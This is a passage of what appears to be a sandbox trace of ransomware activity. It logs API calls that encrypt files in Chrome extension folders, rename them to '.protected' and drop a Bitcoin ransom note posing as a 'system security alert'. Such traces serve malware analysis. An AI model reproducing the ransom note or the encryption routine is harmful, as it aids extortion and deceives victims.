Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected") returned 165 [0078.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected")) returned 1 [0078.605] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.605] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.605] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0078.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.605] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.605] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.606] lstrlenA (lpString="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") returned 684 [0078.606] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.606] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.606] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.607] CloseHandle (hObject=0x164) returned 1 [0078.607] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0078.607] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0078.607] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 141 [0078.607] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0078.607] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0078.607] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*") returned 143 [0078.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.607] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.607] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.607] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.607] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\.") returned 143 [0078.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.607] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.608] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.608] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.608] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\..") returned 144 [0078.608] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.608] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.608] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.608] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") 
returned 155 [0078.608] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.608] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.608] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.609] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.609] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.610] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.610] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.611] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.611] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.611] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.611] CloseHandle (hObject=0x168) returned 1 [0078.611] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected") returned 165 [0078.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.protected")) returned 1 [0078.612] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.612] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.612] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0078.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.612] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.612] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.613] lstrlenA (lpString="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") returned 684 [0078.613] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.613] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.613] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.613] CloseHandle (hObject=0x164) returned 1 [0078.613] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.613] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 141 [0078.614] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0078.614] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*") returned 143 [0078.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.614] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\.") returned 143 [0078.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.614] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.614] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.614] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.614] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\..") returned 144 [0078.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.615] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.615] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.615] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.615] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") 
returned 155 [0078.615] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.615] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.615] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.615] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.617] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.617] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.617] CloseHandle (hObject=0x168) returned 1 [0078.617] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected") returned 165 [0078.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.protected")) returned 1 [0078.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.618] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.618] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0078.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.618] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
